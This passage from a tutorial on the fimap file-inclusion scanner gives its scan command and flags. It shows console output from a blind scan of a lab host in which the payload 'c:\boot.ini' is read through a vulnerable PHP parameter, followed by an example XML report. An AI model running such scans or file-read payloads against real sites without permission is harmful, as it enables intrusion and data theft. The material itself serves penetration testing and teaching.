Report in XML format which includes the detected vulnerable URLs saved on the $HOME/fimap_result.xml path.
Basic usage:
Perform a basic URL scan with a vulnerable parameter. The following instruction initiates the scan on the URL to detect and exploit the Remote/Local File Inclusion vulnerability.
python fimap.py –s -b -u [URL]/[PAGE]?[PARAMETER]=
Where:
- -s: Simple mode scan focused on a single URL.
- -u: URL with the required parameters.
- -b: Blind mode used in cases in which the web application doesn’t throw any errors.
The tool will begin with a quick scan trying to exploit the vulnerability. If it is not successful, the tool will switch to “Blind mode”.
[16:51:45] [OUT] Inspecting URL 'http://192.168.233.128:9001/miaplicacion/infof.php?txt005='...
[16:51:45] [INFO] Fiddling around with URL...
[16:51:45] [INFO] Sniper failed. Going blind...
When the tool detects a vulnerable point for the injection it displays the payload used.
[16:51:45] [OUT] Possible file inclusion found blindly! -> 'http://192.168.233.128:9001/miaplicacion/infof.php?txt005=c:\boot.ini' with Parameter 'txt005'.
[16:51:45] [OUT] Identifying Vulnerability 'http://192.168.233.128:9001/miaplicacion/infof.php?txt005='
Then the tool will performs additional test on the vulnerable point with different payload in order to verify and validate the vulnerability.
[16:51:45] [WARN] Unknown language - Autodetecting...
[16:51:45] [INFO] Autodetect thinks this could be a PHP-Script...
[16:51:45] [INFO] If you think this is wrong start fimap with --no-auto-detect
[16:51:45] [INFO] Testing file 'c:\boot.ini'...
[16:51:45] [INFO] Skipping absolute file 'php://input'.
[16:51:45] [INFO] Skipping remote file 'http://www.phpbb.de/index.php'.
Finally, the tool will present the scan results summary.
###############################################################################
#[1] Possible PHP-File Inclusion #
###############################################################################
#::REQUEST #
# [URL] http://192.168.233.128:9001/miaplicacion/infof.php?txt005= #
# [HEAD SENT] #
#::VULN INFO #
# [GET PARAM] txt005 #
# [PATH] Not received (Blindmode) #
# [OS] Windows #
# [TYPE] Blindly Identified #
# [TRUNCATION] Not tested. #
# [READABLE FILES] #
# [0] boot.ini -> \c:\boot.ini #
###############################################################################
Example report:
<fimap>
<URL hostname="HOST">
<vuln appendix="" blind="1" file="FILE" header_dict="KGRwMAou" header_vuln_key="" ispost="0" kernel="" language="PHP/ASP/JSP/other" mode="r" os="win" param="PARAM" paramvalue="" path="/URL.php?PARAM=" postdata="" prefix="\" remote="0" suffix=""/>
…
</URL>
</fimap>
Resources:
Link: http://fimap.googlecode.com
Author(s): Iman Karim
Contact: fimap.dev [at] gmail.com
License: GNU GENERAL PUBLIC LICENSE Version 2